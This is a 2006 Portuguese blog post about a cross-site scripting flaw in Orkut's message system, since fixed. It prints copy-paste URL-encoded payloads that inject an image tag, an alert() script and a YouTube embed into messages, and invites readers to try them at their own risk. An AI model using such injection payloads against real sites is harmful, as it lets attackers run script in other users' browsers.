segunda-feira, 14 de agosto de 2006

Falha de segurança grave é encontrada no Orkut


Os usuários Victor Pencak e Steven Conte reportaram uma falha de segurança grave no sistema de recados do Orkut. Graças ao bug, as pessoas podem inserir scripts, imagens e vídeos nos recados. Embora o conteudo pareça inofensivo, os scripts e imagens podem explorar falhas no navegador e no sistema, causando danos que variam de simples instabilidades à Vírus e Malwares em geral. Por isso recomendamos muito cuidado com o uso do serviço enquanto o bug não é corrigido.

Para enviar uma imagem a um amigo, basta copiar a url abaixo, substituindo endereco_da_imagem pelo local onde a foto se encontra armazenada.

http://www.orkut.com/%22%3e%3c/a%3e%3Cimg%20src%
3D%22endereco_da_imagem
%22%3E%3Ca%20style%3D%22display%3
Anone%22%20href%3D%22%3C/a%3E

*Url dividida em linhas para facilitar a vizualização

O mesmo código pode ser usado para implantar pequenos scripts. O exemplo à seguir dispara uma caixa de mensagens com o uso da função alert(); Novamente, basta copiar e colar.


http://www.orkut.com/%22%3e%3c/a%3e%3cscript%3ealert
%28%22Oi!!%22%29%3c/script%3e%3ca%20style=%22
display%3anone%22%20href=%22/

*Url dividida em linhas para facilitar a vizualização


Para postar videos do YouTube:

http://www.orkut.com/%22%3e%3c/a%3e%3Cembed%
20src%3D%22http%3A//
www.youtube.com/v/ID%22%3E%3Ca%
20style%3D%22display%3
Anone%22%20href%3D%22

*Url dividida em linhas para facilitar a vizualização

Substitua o ID logo após o endereço youtube.com/v/ pelo id do endereço do vídeo no YouTube, por exemplo se o endereço do vídeo que você quer que apareça é esse: www.youtube.com/watch?v=AkmYXiaQNxs, substitua o ID por AkmYXiaQNxs .




Não nos responsabilizamos pelas conseqüências, experimente por sua conta e risco.

Copiado descaradamente do UnderGoogle.

Update: falha corrigida em menos de um dia.



Pesquisa personalizada

Google News - Entretenimento